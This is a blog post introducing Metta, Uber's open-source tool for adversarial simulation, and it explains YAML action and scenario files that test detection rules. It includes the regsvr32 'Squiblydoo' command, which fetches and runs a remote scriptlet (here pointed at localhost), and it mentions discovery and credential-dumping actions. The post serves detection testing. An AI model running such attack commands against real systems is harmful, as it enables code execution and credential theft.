Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Chris Gates, Senior Security Engineer
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
Adversarial simulation is an emerging concept, and the industry has yet to settle on a single definition, but it involves simulating [components of] targeted attacks in order to test both an organization’s instrumentation stack and its ability to respond to the attack via its incident response process.
This differs from Red Teaming in that adversarial simulation is typically a cooperative activity between the simulation runners and the simulation recipients with an end goal of validating defensive telemetry and testing incident response plans and playbooks. Raphael Mudge wrote a great blog post on the subject, which I recommend.
I’ve covered this topic for the last three years at various conferences [Brucon Slides] [Brucon Video] [WWHF Slides] [WWHF Video] with Chris Nickerson from Lares. At the same time, I made a professional shift from full-time breaker to part/full-time fixer focused on Purple Teaming & Adversarial Simulation.
Ultimately, I began to see far more positive progression with ongoing adversarial simulation than I ever did with periodic red teams (which I previously discussed here). Red Teams end up being about a single point in time and are primarily focused on conducting attacks without being caught by the Blue Team. However, with the right level of organizational maturity, regularly scheduled adversarial simulations can be more valuable in validating defensive rules and incident response processes.
After reviewing several vendor options, we chose to build our own solution based on several existing internal projects. One project standardizes and version-controls our detection rules and enriches them with metadata, similar to the metadata fields you see in the Metta action and scenario files.
The other project uses the underlying Metta engine to programmatically execute actions against various instrumented virtual machines to validate our detection rules and pipelines in an automated, repeatable way. This allows us to verify that the rule syntax is correct (and stays correct) and that our alerting pipeline is up and functioning as intended, multiple times a day.
Metta uses Redis/Celery, Python, and Vagrant with VirtualBox to do adversarial simulation. This allows you to test (mostly) your host-based instrumentation, but may also allow you to test network-based detection and controls, depending on how you set up your Vagrant machines.
Metta parses YAML files containing a list of “actions” [multistep attacker behavior] and uses Celery to queue these actions up and run them one at a time, requiring no manual interaction with the hosts.
An example action file looks like the below:
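For illustration, a minimal action file might look something like the following sketch. The exact field names and layout are assumptions based on the fields described in this post (phase, technique, link, and purple_actions), not a verbatim copy of Metta’s schema:

```yaml
---
meta:
  name: execution_regsvr32
  os: windows
  # MITRE ATT&CK mapping (phase and technique names assumed for illustration)
  mitre_attack_phase: Execution
  mitre_attack_technique: Regsvr32 (T1117)
  link: https://attack.mitre.org/wiki/Technique/T1117
  # The command(s) Metta will queue and execute on the target VM
  purple_actions:
    - cmd.exe /c regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll
```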
As you can see, the YAML file maps back to both the MITRE ATT&CK phase and technique, includes a link to more information about the attack, and contains (in this case) one purple_action:
cmd.exe /c regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll
This command executes the regsvr32 “Squiblydoo” attack against the local host in a benign way. It will not cause any lasting damage to the host, but should cause any host-based alerting for the attack to fire.
Of course, it is also possible to perform multiple actions by listing them one at a time, and Metta will run them in sequence:
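A discovery-style action file, for example, might queue several reconnaissance commands in order. As before, this is an illustrative sketch with assumed field names, not Metta’s exact schema:

```yaml
---
meta:
  name: discovery_account
  os: windows
  mitre_attack_phase: Discovery
  mitre_attack_technique: Account Discovery (T1087)
  # Each command is queued via Celery and run in sequence on the host
  purple_actions:
    - whoami
    - net user
    - net localgroup administrators
```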
You can also perform scenarios, which are a list of action files. This way you can simulate multiple phases of an attack with one file. Here is an example of a scenario file:
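A scenario file of this kind might look like the sketch below, which simply lists the action files to run in order. The `scenario_actions` key is an assumption for illustration; the action paths match the example described next:

```yaml
---
meta:
  name: example_scenario
  os: windows
  # Action files are executed top to bottom, one phase after another
  scenario_actions:
    - Discovery/discovery_account
    - Credential_Access/credaccess_win_creddump
    - Execution/execution_regsvrs32
```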
This scenario will run the Discovery/discovery_account actions, followed by the Credential_Access/credaccess_win_creddump actions, followed by the Execution/execution_regsvrs32 actions.
The reporting functionality is fairly basic, but Metta logs all output to a JSON file in the project root directory and to a simple HTML log. This should allow you to incorporate the results into whatever framework or tool you wish for post-simulation processing.
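As a sketch of that post-processing step, the snippet below tallies simulated actions per operating system from JSON log records. The record schema here (one JSON object per line with an `os` field) is an assumption for illustration; adjust it to match the records your Metta run actually writes:

```python
import json


def summarize_actions(log_lines):
    """Tally simulated actions per OS from JSON log lines.

    NOTE: the schema (one JSON object per line with an 'os' field)
    is assumed for illustration, not taken from Metta's real output.
    """
    counts = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        entry = json.loads(line)
        os_name = entry.get("os", "unknown")
        counts[os_name] = counts.get(os_name, 0) + 1
    return counts


# Synthetic example records, not real Metta output:
sample = [
    '{"os": "windows", "purple_action": "whoami"}',
    '{"os": "windows", "purple_action": "net user"}',
]
print(summarize_actions(sample))  # {'windows': 2}
```

From here it is straightforward to push the counts into whatever dashboard or alert-validation tooling you already use.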